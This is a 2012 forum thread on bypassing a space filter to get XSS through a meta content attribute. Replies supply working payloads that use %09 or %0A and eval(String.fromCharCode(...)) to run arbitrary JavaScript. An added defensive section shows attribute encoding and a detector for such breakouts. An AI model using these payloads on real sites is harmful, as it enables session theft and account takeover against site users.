Hard XSS
Posted by: Plitvix
Date: August 04, 2012 07:34PM

Hello people,
I am having a problem getting one vector to work:

I inject into <head><meta content="my vector"/>
But the problem is that spaces are URL-encoded to %20 and I cannot use / because of the .htaccess URL rewrite (page not found).
Any ideas?

Re: Hard XSS
Posted by: Razor4x
Date: August 06, 2012 01:55PM

You mean if you inject something like this:
"><body onload=alert(1);>
it will become like this:
"><body%20onload=alert(1);>

?

Re: Hard XSS
Posted by: Plitvix
Date: August 12, 2012 03:49PM

yes.

Re: Hard XSS
Posted by: Razor4x
Date: August 12, 2012 04:40PM

Try something like this:
<body%09onload="alert(1)";>

Re: Hard XSS
Posted by: cr101
Date: August 13, 2012 08:32AM

That should work. If you want to run whatever JS from there, converting it to CharCode and then eval()-ing it should let you run anything you want without spaces or slashes.

So the final injection would be:
"><body%09onload="eval(String.fromCharCode(convertedPayload))">

Also, if %09 doesn't work for some odd reason, you could try a newline (%0A).



Edited 1 time(s). Last edit at 08/13/2012 09:02AM by cr101.

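The thread shows why a server-side filter that only blocks literal spaces (or relies on them being percent-encoded) does not protect a value reflected into <meta content="...">: HTML treats tab, newline, CR and form feed as attribute separators too. The example below, added here and not part of any post in the thread, contrasts that weak check with proper HTML attribute encoding, and adds a detection helper that URL-decodes the raw parameter and treats all HTML whitespace alike. The sample input is constructed from the payload shape posted above; convertedPayload is the thread's own placeholder, not a real value.

```javascript
// Added example, not from the thread. Defender-side view of the "%09 instead
// of space" problem: what a naive filter misses, what correct output encoding
// does, and how to detect the attempt regardless of which whitespace is used.

// Constructed sample: the value as the server sees it after URL-decoding,
// with a tab where a space would have been. convertedPayload is a placeholder.
const SAMPLE_INPUT = '"><body\tonload="eval(String.fromCharCode(convertedPayload))">';

// Weak defence: only literal spaces are rejected. A tab or newline passes.
function naiveSpaceFilter(value) {
  return !value.includes(' ');
}

// Correct defence: encode every character that has meaning inside a quoted
// attribute, so the value can never close the attribute or open a new tag.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// Render the meta tag from the original post with the value safely encoded.
function renderMeta(value) {
  return `<meta content="${encodeForHtmlAttribute(value)}"/>`;
}

// Detection helper for logs or a WAF rule: URL-decode first, then look for an
// attribute/tag breakout followed by an on* event handler, accepting any HTML
// whitespace (tab, LF, CR, form feed, space) between tag name and attribute.
function looksLikeAttributeBreakout(rawValue) {
  let decoded = rawValue;
  try {
    decoded = decodeURIComponent(rawValue);
  } catch (_) {
    // Malformed percent-encoding: inspect the raw string instead.
  }
  return /["'>][\s\S]*?<\w+[\t\n\r\f ]+on\w+\s*=/i.test(decoded);
}

// Stand-alone run: show the three checks side by side.
console.log('naive filter lets tab variant through:', naiveSpaceFilter(SAMPLE_INPUT));
console.log('encoded output:', renderMeta(SAMPLE_INPUT));
console.log('flagged by normalized detector:',
  looksLikeAttributeBreakout('%22%3E%3Cbody%09onload%3Dalert(1)%3B%3E'));
```

The encoder is the fix; the detector is only there to show that any check on the raw parameter must decode it and treat every HTML whitespace character the same, otherwise the %09 and %0A variants from the thread slip past a rule written for %20.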

